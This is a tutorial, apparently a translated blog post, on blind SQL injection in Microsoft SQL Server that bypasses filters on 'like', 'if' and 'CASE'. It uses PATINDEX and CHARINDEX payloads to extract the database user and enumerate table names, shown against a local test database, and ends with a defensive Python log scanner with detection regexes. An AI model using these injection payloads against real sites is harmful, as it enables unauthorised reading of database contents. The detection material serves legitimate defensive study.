0x01 Overview
Running into filtering while attacking a site is perfectly normal.
This method applies when like, if and CASE are filtered,
that is, when like-based injection cannot be used normally and the page also has no echo (blind).
| Replacement for like | Explanation |
|---|---|
| PATINDEX('%pattern%', expression) | Returns the position of the first occurrence of the pattern string within expression; positions start at 1, and 0 is returned when there is no match. This function behaves almost exactly like like and accepts the same wildcards (_ % [ ] [^]) for searching. |
| CHARINDEX('pattern', expression) | Returns the position of the first occurrence of the pattern string within expression; positions start at 1, and 0 is returned when there is no match. |
0x02 Test data
```
1> select * from article;
2> go
+----+-----------+-----------+
| id | title     | content   |
+----+-----------+-----------+
| 1  | 测试标题  | 测试内容  |
| 2  | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
```
```
# Test table data: users
sql server> select * from users;
+----+--------------+----------+
| id | username     | password |
+----+--------------+----------+
| 1  | test-user-01 | 123456   |
| 2  | test-user-02 | 234567   |
+----+--------------+----------+
2 rows in set (0.00 sec)
```
```
sql server> SELECT system_user;
+-----------------------+
| field1                |
+-----------------------+
| sa                    |
+-----------------------+
1 row in set (0.00 sec)
```
```
sql server> select db_name();
+-----------------------+
| field1                |
+-----------------------+
| test                  |
+-----------------------+
1 row in set (0.00 sec)
```
0x02 PATINDEX()
0x02.1 Querying the user
SQL: select 'test' where patindex('%sa%', system_user)>=1;
```
# system_user = sa
# Matching case
1> select 'test' where patindex('%sa%', system_user)>=1;
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
# Non-matching case
1> select 'test' where patindex('%aaa%', system_user)>=1;
2> go
+--+
|  |
+--+
+--+
(0 rows affected)
```
0x02.2 Querying table names
Note:
The name inside OVER(Order by table_name) must be changed to a column that actually exists in the test.dbo.sysobjects table.
To query a different database, reference it like this.
For example, if there are a test database and a test2 database,
they can be called as
test.dbo.sysobjects
test2.dbo.sysobjects
To query a different table, do it like this.
For example:
change to row_number>=1
change to row_number>=2
Note:
XType='U' returns all user tables of a database;
XType='S' returns all system tables of a database;
For example, the query below retrieves the table names of the test database.
SQL: select 'test' where patindex('%article%', (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1))>=1
```
# First table name = article
# Matching case
1> SELECT 'test' WHERE patindex('%article%', (SELECT name FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name FROM test.dbo.sysobjects WHERE XType = 'U') AS a WHERE row_number = 1)) >= 1;
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
# Non-matching case
1> SELECT 'test' WHERE patindex('%aaaaaaaaaaaaaa%', (SELECT name FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name FROM test.dbo.sysobjects WHERE XType = 'U') AS a WHERE row_number = 1)) >= 1;
2> go
+--+
|  |
+--+
+--+
(0 rows affected)
```
0x03 CHARINDEX()
0x03.1 Querying the user
SQL: select 'test' where charindex('s', system_user)>=1
```
# system_user = sa
# Matching case
# First character of system_user
1> select 'test' where charindex('s', system_user)>=1
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
# Up to the second character of system_user
1> select 'test' where charindex('sa', system_user)>=1
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
# Non-matching case
1> select 'test' where charindex('aaaaa', system_user)>=1
2> go
+--+
|  |
+--+
+--+
(0 rows affected)
```
0x03.2 Querying table names
SQL: select 'test' where charindex('ar', (select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType='U') as a where row_number=1))>=1
```
# First table name = article
# Matching case
# Probing characters 1-2
1> SELECT 'test' WHERE charindex('ar', (SELECT name FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name FROM test.dbo.sysobjects WHERE XType = 'U') AS a WHERE row_number = 1)) >= 1;
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
# Probing characters 1-4
1> SELECT 'test' WHERE charindex('arti', (SELECT name FROM (SELECT ROW_NUMBER() OVER (ORDER BY name) AS row_number, name FROM test.dbo.sysobjects WHERE XType = 'U') AS a WHERE row_number = 1)) >= 1;
2> go
+------+
|      |
+------+
| test |
+------+
(1 rows affected)
```
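The lesson for the defending side is that a keyword blocklist on like, if and CASE leaves PATINDEX and CHARINDEX untouched, so the durable application fix is parameterised queries, and monitoring should look for the shape of these blind probes rather than for single keywords. The following Python is an added example written for this post, not code from the original author: it scans constructed web-server access-log lines (the sample lines, rule names, weights and alert threshold are all assumptions) and scores each request on the combination that the PATINDEX and CHARINDEX queries above share: a substring-position function, a numeric comparison on its result, and an identity probe (system_user) or catalog enumeration (sysobjects with ROW_NUMBER() OVER).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post): one benign
# request, two carrying the probe patterns described above, and one benign
# request that merely contains the word "charindex" in a search term.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.aspx?id=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article.aspx?id=2%20and%20patindex(%27%25sa%25%27,system_user)%3E%3D1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article.aspx?id=2%20and%20charindex(%27ar%27,(select%20name%20from%20(select%20row_number()%20over(order%20by%20name)%20as%20row_number,name%20from%20test.dbo.sysobjects%20where%20xtype=%27U%27)%20as%20a%20where%20row_number=1))%3E%3D1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.aspx?q=charindex%20tutorial HTTP/1.1" 200 2048',
]

# Extracts the request target from a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

# Each rule: (name, regex applied to the normalised query string, weight).
# Weights are assumptions chosen so that a function call alone never alerts,
# but a call combined with an identity or catalog probe does.
RULES = [
    ("substring-position-fn", re.compile(r"\b(?:patindex|charindex)\s*\("), 2),
    ("comparison-after-fn", re.compile(r"\)\s*(?:>=|<=|>|<|=|!=)\s*\d"), 1),
    ("system-identity-probe", re.compile(r"\bsystem_user\b|\buser_name\s*\(|\bdb_name\s*\("), 2),
    ("catalog-enumeration", re.compile(r"\bsysobjects\b|\bsys\.(?:tables|objects|columns)\b|\binformation_schema\b"), 2),
    ("row-selection-window", re.compile(r"\brow_number\s*\(\s*\)\s*over\s*\("), 1),
]

ALERT_THRESHOLD = 3  # assumed: a function call plus at least one probe indicator


def normalise(target):
    """URL-decode twice (covers double encoding), lower-case, collapse whitespace."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded).lower()


def score_request(target):
    """Return (score, [matched rule names]) for one request target."""
    text = normalise(target)
    if "?" not in text:
        return 0, []
    query = text.split("?", 1)[1]
    score, hits = 0, []
    for name, rx, weight in RULES:
        if rx.search(query):
            score += weight
            hits.append(name)
    return score, hits


def scan_log(lines, threshold=ALERT_THRESHOLD):
    """Return one alert dict per log line whose score reaches the threshold."""
    alerts = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        score, hits = score_request(target)
        if score >= threshold:
            alerts.append({"target": target, "score": score, "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG_LINES):
        print(alert["score"], alert["rules"], alert["target"])
```

On the sample lines only the two probe requests alert (scores 5 and 6); the plain article request and the search for "charindex tutorial" score 0 because the function name must be followed by an opening parenthesis and combined with a comparison or a probe indicator. Decoding twice before matching is what keeps simple double-URL-encoding from hiding the pattern.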
